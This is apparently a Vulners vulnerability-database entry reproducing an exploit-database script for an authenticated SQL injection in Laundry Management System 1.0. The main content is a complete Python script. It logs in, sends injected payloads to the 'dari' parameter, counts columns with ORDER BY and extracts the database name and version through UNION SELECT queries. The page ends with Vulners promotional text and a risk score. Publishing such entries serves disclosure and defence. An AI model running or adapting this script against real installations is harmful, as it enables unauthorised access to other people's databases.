Vulners
Lucene search
Laundry Management System 1.0 SQL Injection
`# Exploit Title: Laundry Management System 1.0 - Authenticated SQL Injection
# Date: 29-06-2022
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ci_laundry.zip
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A
# Description
# The dari parameter does not perform input validation on the laporan_filter.php file it allow authenticated SQL Injection
import sys
import requests
sess = requests.Session()
proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}
def login(ip,username,password):
target = "http://%s/ci_laundry/welcome/login" % ip
daftar = {'username':username,'password':password}
masuk = sess.post(target, data=daftar, proxies=proxies)
if "Dashboard" in masuk.text:
print("[$] Success Login :)")
else:
return False
def trigger_sqli(ip):
target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip
sql = {"dari":"1'",'sampai':'123'}
test = sess.post(target, data=sql, proxies=proxies)
if "You have an error in your SQL syntax" in test.text:
print("[$] Trigger SQL Injection !!!! :)")
else:
return False
def count_column(ip):
target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip
sql = {"dari":"1' ORDER BY 14-- -",'sampai':'123'}
test = sess.post(target, data=sql, proxies=proxies)
if test.status_code == 200:
print("[$] Found 14 Column In Database !!! :)")
def got_database_name(ip):
target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip
sql = {"dari":"1' union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'}
test = sess.post(target, data=sql, proxies=proxies)
if "laundry_db" in test.text:
print("[$] Found Database Name is => laundry_db")
def got_version_data(ip):
target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip
sql = {"dari":"1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'}
test = sess.post(target, data=sql, proxies=proxies)
if "10.4.24-MariaDB" in test.text:
print("[$] Found Version Database is => 10.4.24-MariaDB")
if __name__ == "__main__":
try:
ip = sys.argv[1].strip()
username = sys.argv[2].strip()
password = sys.argv[3].strip()
except IndexError:
print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
print("[-] Example: %s 192.168.1.x admin admin123" % sys.argv[0])
sys.exit(-1)
login(ip,username,password)
trigger_sqli(ip)
count_column(ip)
got_database_name(ip)
got_version_data(ip)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jun 2022 00:00Current
0.7Low risk
Vulners AI Score0.7